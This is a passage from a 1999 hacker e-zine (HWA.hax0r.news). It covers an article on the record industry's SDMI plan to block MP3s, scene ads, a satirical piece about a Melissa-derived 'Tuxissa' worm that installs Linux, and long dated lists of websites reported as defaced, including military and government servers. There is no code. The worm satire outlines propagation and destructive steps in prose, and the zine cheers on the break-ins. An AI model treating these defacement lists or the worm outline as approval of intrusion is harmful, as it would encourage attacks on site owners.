products that, when activated at a later date, would prevent users from downloading or playing non-SDMI-compliant music. The hardware would initially support MP3 and other compressed file formats, but a signal from the RIAA would activate the blocking trigger. Hardware and software developers that refuse to build in the switch would not have access to the SDMI specifications or the major-label music that will be made available when the specification is complete. According to a source who attended the SDMI meeting last week, participants discovered that the Internet and music industries have precious little in common. Coming to a consensus on the delivery of digital music may be all but impossible, said the source, who requested anonymity. Committee members from the technology industry were convinced that record labels don't "get" the Internet, where open standards are the norm. Others were upset that the subcommittee was so exclusive. Microsoft, Lucent, and a handful of PC manufacturers were the only technology companies present in sessions dominated by the RIAA and its record labels. "There was a lot of distaste around the room and loud conversations in the hallway with Leo [Leonardo Chiariglione, executive director of SDMI] and Cary [Sherman, senior executive vice president for the RIAA]," the source said. The RIAA refused to comment on the negotiations. "Ultimately, if it continues down this path, there will be an unworkable solution for the customers," said the SDMI source. "Will I buy a Rio that supports MP3, or possibly a Samsung player that does not? The labels are concerned about their distribution channels and how the stores will treat them. But while there are 30,000 titles in brick-and-mortar, the labels own 10 times that." Another source who attended the meeting, and who also asked to remain anonymous, said that PC and hardware makers are resisting the RIAA's plans because they see an immediate market for MP3-based players. Already there are many players on the street and under development, and the market for selling legitimate MP3 music and products is in its infancy. "This transition group asked the question, 'do we ban MP3s?' and the answer was a clear and resounding 'no' from PC makers. They are not going to drop support for MP3 anytime soon, and more and more manufacturers want to have players ready for Christmas," said the source. For other companies caught in the middle of the debate, the issues were not so clear-cut. "With companies like Sony, that sell both content and hardware and are on both sides of the battle, it's very interesting," the source said. The initial SDMI specification for portable players is due by the end of June, and a full-blown architecture by March 2000. There are several encryption and security companies currently working on the proposed trigger device that will present their solutions within the next few weeks. The next SDMI meeting is scheduled for next week in Washington. "This reminds me of the early days of the CD recording market, with all the different file formats and people jockeying for position. The same thing is happening here, but there are 250 participants," said Dave Ulmer, general manager of Adaptec's software products group, who was at the SDMI meeting in London. "There are companies that see their future hinging on being part of this SDMI solution, and others just want to know what it is." One source said that "there is no way in hell" that SDMI-compliant products will be ready for the Christmas season because "the individuals involved in these conversations are too concerned about their interests and [are] not looking for a real solution. Some guy with a digital kiosk wants everything for kiosks, and another guy with encryption wants his stuff in, and so on." Steve Grady, vice president of marketing at MP3 retailer GoodNoise, said that if the record labels don't put the consumer first in their architecture plans, piracy will only increase and the industry could ultimately lose out on new business opportunities on the Web. "The problem is that you're talking about consumers and people adopting a technology and using music in a certain way. But you have to stay focused on the consumer here. What you're competing against is free product, and that won't go away," Grady said. "Something better than MP3 will come along. The ability to move music around is key, and if you try to force something that has attributes they don't want, it won't be successful." While the SDMI specification may ultimately become the standard for the music industry, there is no guarantee that it has the inside track. During the past few weeks, recording industry companies have formed alliances that could undermine SDMI's acceptance. Lucent teamed up with the Universal Music Group, while Microsoft allied with Sony on content distribution deals. In the coming months, the SDMI equation could get even more complicated if the major labels decide to go their own way. "What's interesting is Universal and Sony. It's like the Oklahoma land rush with their marketing power and Microsoft's monopoly," said one source. "If they get the market to adopt their standard, it's wide open. I don't think SDMI has a lock on what the standard will be." "Welcome to the software business," was the general sentiment among sources who recalled the similar battles over standards within the Internet industry. "[It's] turning into the Unix battle of the music industry," said one source, who said that ultimately open standards will prevail. "Any company that tries [proprietary formats] realizes it fails. Look at IBM, one of the oldest computer companies, and they've embraced the Web. It's a hard lesson, and the labels may have to learn it." The RIAA has made it clear that it's willing to fight for its interests in the courts. It has the money and the muscle to try to convince technology companies and Internet music vendors to see things its way. But just the same, it may not win the battle. "There is a big gap in the way major labels think about the world and what's going on today on the Internet. For all the discussion on format battles, is there really a battle going on in the consumer space?" Grady said. "There is only one player right now, and it's MP3. The only battle is taking place is in meeting rooms. The Internet is a different environment, and the labels need to understand the culture and what you are dealing with here," Grady said. @HWA AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ****************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * *****************************************************************************
Come.to/Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j http:/ 99 http:o http:/ login: sysadmin n99 httpi /come. password: tp://comn to/Can me.to/Cat c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h http:/ industry people to attend with booths and talks. 99 http:e /come. you could have a booth and presentation for the cost of p://comel http:/ little more than a doorprize (tba) contact us at our main n99http:i http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s http:/ for updates. This is the first Canadian event of its type invalid t 403 Fo and will have both white and black hat attendees, come out logged! ! 404 Fi and shake hands with the other side... *g* mainly have some IP locked ome.to fun and maybe do some networking (both kinds). see ya there! hostname http:/ x99http:x o/Canc x.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 Canc0n99 Canc0n99 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$ ! ! $ $ ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** ! $ $ ! ! $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$ www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Attack of the Tuxissa Virus March 29, 1999 What started out as a prank posting to comp.os.linux.advocacy yesterday has turned into one of the most significant viruses in computing history. The creator of the virus, who goes by the moniker "Anonymous Longhair", modified the well-known Melissa[1] virus to download and install Linux on infected machines. "It's a work of art," one Linux advocate told Humorix after he looked through the Tuxissa virus source code. "This virus goes well beyond the feeble troublemaking of Melissa." The advocate enumerated some of the tasks the virus performs in the background while the user is blissfully playing Solitaire: Once the virus is activated, it first works on propogating itself. It has a built-in email harvesting module that downloads all the pages referenced in the user's Internet Explorer bookmarks and scans them for email addresses. Using Outlook, the virus sends a copy of itself to every email address it comes across. After it has successfully reproduced, the virus begins the tricky process of upgrading the system to Linux. First, the virus modifies AUTOEXEC.BAT so that the virus will be re-activated if the system crashes or is shut down while the upgrade is in process. Second, the virus downloads a stripped-down Slackware distribution, using a lengthy list of mirror sites to prevent the virus from overloading any one server. Then the virus configures a UMSDOS filesystem to install Linux on. Since this filesystem resides on a FAT partition, there is no need to re-partition the hard drive, one of the few actions that the Word macro langugage doesn't allow. Next, the virus uncompresses the downloaded files into the new Linux filesystem. The virus then permanently deletes all copies of the Windows Registry, virtually preventing the user from booting into Windows without a re-install. After modifying the boot sector, the virus terminates its own life by rebooting the system. The computer boots into the Slackware setup program, which automatically finishes the installation of Linux. Finally, the dazed user is presented with the Linux login prompt and the text, "Welcome to Linux. You'll never want to use Windows again. Type 'root' to begin..." The whole process take about two hours, assuming the user has a decent Internet connection. Since the virus runs invisibly in the background, the user has no chance to stop it until it's too late. The email message that the virus is attached to has the subject "Important Message About Windows Security". The text of the body says, "I want to let you know about some security problems I've uncovered in Windows 95/98/NT, Office 95/97, and Outlook. It's critically important that you protect your system against these attacks. Visit these sites for more information..." The rest of the message contains 42 links to sites about Linux and free software. Slashdot is one of those links. "That could spell trouble," one Slashdot expert told Humorix. "Slashdot could fall victim to the new 'Macro Virus Effect' if this virus continues to propogate at its present exponential growth rate. Red Hat's portal site, another site present on the virus' links list, seems to be quite sluggish right now..." Details on how the virus started are a bit sketchy. The "Anonymous Longhair" who created it only posted it to Usenet as an early April Fool's gag, a demonstration of how easy it would be to mount a "Linux revolution". Some other Usenet reader is responsible for actually spreading the virus into the wild. One observer speculated, "I imagine the virus was first sent to the addresses of several well-known spammers. The virus probably latched on to the spammer's email lists and began propagating at a fantastic rate. With no boundary to its growth, this thing could wind up infecting every single Net-connected Wintel box in the world. Wouldn't that be a shame!" Linus Torvalds, who just left for a two week vacation, was unavailable for comment at press time. We have a strong feeling that his vacation will be cut short very soon... [1] http://linuxtoday.com/stories/4463.html --- James S. Baughn http://i-want-a-website.com/about-linux/ @HWA SITE.1 http://smog.cjb.net/ ~~~~~~~~~~~~~~~~~~~~ Smogzer's site. this site has news bytes from a wide range of interesting areas from Science and techno to security everything from Sony's new robot dog to the new Windump windows version of tcpdump is reported here, check it out...the graphics are pleasing and the site is well laid out, go there now, you know you want to... http://smog.cjb.net/ @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... May 10th Over the weekend some people were really busy... From HNN's rumour section http://www.hackernews.com/ contributed by Anonymous Cracked It has a been a busy weekend for some. Plenty of military and government servers and quite a few new names popping up. A smattering international servers and even mass domain creacks. Here is the loooong list of servers that have been reported as cracked. http://dailymp3z.net/ http://phoenix.placement.oakland.edu/ http://www.mursuky.edu http://www.abstractcomputers.com http://www.mursuky.edu http://www.naturalbornassholes.com http://www.usembassy-china.org.cn/ http://www.abstract.ab.ca http://www.helio.com http://lhs.vboard.com http://ocse.acf.dhhs.gov http://www.telephone.sk http://www.uvd.com.hk http://www.cowbells.com http://www.cookieman.com http://www.jimmyhollywood.com http://www.bam.nl http://www.boxman.nl http://www.centraalbeheer.nl http://www.clic.nl http://sony.clic.nl http://www.cmg.nl http://www.defcom.nl http://www.dmsa.nl http://www.vitae.nl http://www.hcmaatschap.nl http://www.preview.nl http://www.thehealing.nl http://www.pds.nl http://www.graphichat.com http://www.helio.com http://www.pagemate.com http://www.thehealing.com http://www.yousee.com http://www.mount.n-yorks.sch.uk http://www.I-spy.net http://www.tax99.co.uk http://www.spyteam.co.uk http://www.sybase.it/ http://www.cool.co.il http://www.worldclassbeauties.com http://admin.engr.wisc.edu/ http://www.ntc.cap.af.mil/ http://www.sm.nps.navy.mil/ http://www.eh.doe.gov/ http://www.pwcyoko.navy.mil/ http://www.nem.barc.usda.gov/ http://safetynet.smis.doi.gov/ http://www.landersoil.com http://www.webspace.it http://www.motophoto.com http://www.mount.n-yorks.sch.uk http://www.cse.ca http://ntcsslab.nosc.mil http://sfbay.wr.usgs.gov http://www.I-spy.net http://www.netcom.be http://www.spyteam.co.uk http://www.tax99.co.uk http://www.cowbells.com http://www.cookieman.com http://www.jimmyhollywood.com http://ecure.bayareagold.com May 11th From HNN rumours section Cracked The following site have been reported to HNN as cracked. http://ucnexus.berkeley.edu http://www.scandi.com.mx http://www.tdpnet.com http://www.corel.com http://www.whitehouse.gov http://ns1.tornado.ie/ May 12th From HNN rumours section contributed by Anonymous Cracked The following sites have been reported as cracked. http://www.nacced.org/ http://christianfamily.faithweb.com http://ns1.tornado.ie http://www.landersoil.com http://www.lcpages.com May 13th From HNN rumours section; contributed by Anonymous Cracked The following sites have been reported to HNN as cracked. http://hfobr.com http://middletown.org http://www.arcon.ru http://www.cyberflirt.net http://www.vboard.com http://armstrong.scu.edu http://www.autosportmag.com http://www.sba.oakland.edu http://www.des.uwm.edu http://ceis.ha.osd.mil http://www.lakehurst.navy.mil http://www.unitedalbania.com http://www.middletown.org http://www.unitedalbania.com/ http://www.asus.com/ http://www.cyberflirt.com http://www.swisstennis.com/ http://directory.metro.org http://www.artleather.com/ May14th contributed by Anonymous Cracked The following sites have been reported as cracked. http://www.asus.com http://kariba.africaonline.com http://www.africaonline.com/ http://www.acb-is.net http://directory.metro.org http://www.cankaya.edu.t ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.genocide2600.com/~tattooman/zines/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Go there Brasil........: http://www.psynet.net/ka0z Go there http://www.elementais.cjb.net Go there Columbia......: http://www.cascabel.8m.com Go there http://www.intrusos.cjb.net Go there Indonesia.....: http://www.k-elektronik.org/index2.html Go there http://members.xoom.com/neblonica/ Go there http://hackerlink.or.id/ Go there Netherlands...: http://security.pine.nl/ Go there Russia........: http://www.tsu.ru/~eugene/ Go there Singapore.....: http://www.icepoint.com Go there Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]